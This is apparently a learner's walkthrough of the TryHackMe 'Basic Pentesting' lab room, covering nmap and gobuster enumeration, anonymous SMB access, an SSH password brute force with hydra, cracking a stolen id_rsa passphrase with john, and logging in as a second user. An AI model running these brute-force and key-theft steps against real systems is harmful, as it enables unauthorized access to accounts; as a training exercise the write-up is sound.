TryHackMe: Basic Pentesting
Basic Pentesting is a room that you don’t need to be months into cybersecurity to complete, small knowledge is enough and researching is easy too. Still falling in some rabbit holes but getting better. Trying my best to keep myself out of walkthroughs and its going well, i only go for little things, but i still have a long way ahead of me, a lot to learn and master… just getting started!
https://tryhackme.com/r/room/basicpentestingjt
Initial Enumeration
Nmap Scan
We start by enumerating the network:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -T4 -n -sC -sV -Pn 10.10.141.249
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-09 19:11 WET
Nmap scan report for 10.10.141.249
Host is up (0.092s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13?
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http-proxy
|_http-favicon: Apache Tomcat
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2025-01-09T14:14:03-05:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 1h40m00s, deviation: 2h53m13s, median: 0s
| smb2-time:
| date: 2025-01-09T19:14:02
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 202.82 seconds
Based on the nmap scan we see that we the following ports open:
- 22/SSH
- 80/HTTP
- 139, 445/SMB
- 8009/ajp13?
- 8080/HTTPS
Web 80
We will start by visiting port 80, which gives us an ‘undergoing maintenance’ message:
Port 8080 takes a very looong time to load and only has the apache tomcat default page:
Gobuster Scan
Since there isn’t much for us to find in both pages it’s wiser to use a directory search tool like gobuster, running gobuster on port 8080 will not work because of client timeout, so we can only run gobuster on port 80:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x ".html,.txt,.php" -t 25 --timeout 20s -u http://10.10.141.249:80
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.141.249:80
[+] Method: GET
[+] Threads: 25
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php
[+] Timeout: 20s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 158]
/.html (Status: 403) [Size: 293]
/development (Status: 301) [Size: 320] [--> http://10.10.141.249/development/]
/server-status (Status: 403) [Size: 301]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
Most of the scans done here usually take quite a long time, it’s advised to run the scans in the most raw way possible with little to no options and if nothing useful returns then yes, run these more detailed scans.
From the scan we see a new directory called development, and when visiting it we see the following:
Two text files, dev.txt and j.txt, that when read give us the following:
We get to know that smb is indeed being used and it’s version too, 2.5.12, but before looking for any exploits we must enumerate smb first.
SMB
Without going too much in depth, enumerating smb is pretty simple, we just need to connect to it anonymously, which in this case was the meant path:
1
2
3
4
5
6
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient //10.10.141.149/Anonymous
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \>
Doing a simple ls returns a single file called staff.txt, which we can download to our device with the get command to read it’s content:
1
2
3
4
5
6
7
8
9
smb: \> ls
. D 0 Thu Apr 19 18:31:20 2018
.. D 0 Thu Apr 19 18:13:06 2018
staff.txt N 173 Thu Apr 19 18:29:55 2018
14318640 blocks of size 1024. 10822620 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \>
Opening the staff.txt file we get two possible usernames, Jan and Kay:
1
2
3
4
5
6
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
Brute forcing ssh
Having these two usernames means that now we can try to brute force into one of them and get access to the respective machine, and based on the j.txt file from port 80 we see that “-J” has a weak password, so we’ll try to brute force Jan first since it will take us way less time.
To do so we will be using the hydra tool with ssh:
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~/Desktop]
└─$ hydra -t 64 -l jan 10.10.141.249 ssh -P /usr/share/wordlists/rockyou.txt
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-09 19:43:16
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://10.10.141.249:22/
[STATUS] 674.00 tries/min, 480 tries in 00:01h, 14343772 to do in 354:42h, 17 active
[22][ssh] host: 10.10.141.249 login: jan password: [REDACTED]
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-09 19:45:44
We found Jan’s password, but trying to brute force kay just gives us a timetout error, so our only option really is to connect to Jan’s machine:
1
2
jan@basic2:~$ whoami
jan
Now that we are inside, is just exploring the machine for vulnerabilities.
Reading /etc/passwd we see that there are 2 users home directories, jan's and kay's, to start off they are a good place to search for useful files. First was jan but we didn’t find anything:
1
2
3
4
5
jan@basic2:/$ ls -la home/jan
total 12
drwxr-xr-x 2 root root 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 root jan 47 Apr 23 2018 .lesshst
But on kay's home directory we see a pass.bak but sadly with root permissions only:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
jan@basic2:/$ ls -la home/kay
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
.bakfiles are backup files, and since it’s called “pass” we can only assume it’s a password backup file so our interest is to switch users to kay and access it.
We see too an .ssh directory with read permissions for every user, and inside we can find a file called id_rsa, which can be used to log into the user without needing the password, and lucky enough it is readable to all users too:
1
2
3
4
5
6
7
jan@basic2:/home/kay/.ssh$ ls -la
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 ..
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
Logging into ssh with id_rsa key
We can now read the id_rsa file and copy its content into a new file on our device:
1
2
3
4
5
┌──(kali㉿kali)-[~/Desktop]
└─$ echo '[REDACTED]' > id_rsa
┌──(kali㉿kali)-[~/Desktop]
└─$ chmod 600 id_rsa
Not giving the right permissions(other than 400 or 600) can lead to errors and it will be ignored or rejected by ssh when reading the id_rsa file.
Cracking id_rsa password
If we try to log into kay now it will ask us for a id_rsa password:
1
2
3
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -i id_rsa kay@10.10.141.249
Enter passphrase for key 'id_rsa':
To get around this we will use ssh2john, it will then give us a hash that we can use with the normal john command:
1
2
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh2john id_rsa > hash
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/Desktop]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED] (id_rsa)
1g 0:00:00:00 DONE (2025-01-09 22:34) 6.250g/s 517200p/s 517200c/s 517200C/s behlat..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We get the password and all we have to do now is connect to kay’s machine:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -i id_rsa kay@10.10.141.249
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Thu Jan 9 17:38:41 2025 from [REDACTED]
kay@basic2:~$
And to get the last flag we just have to read the pass.bak:
1
2
3
4
5
kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
[REDACTED]
kay@basic2:~$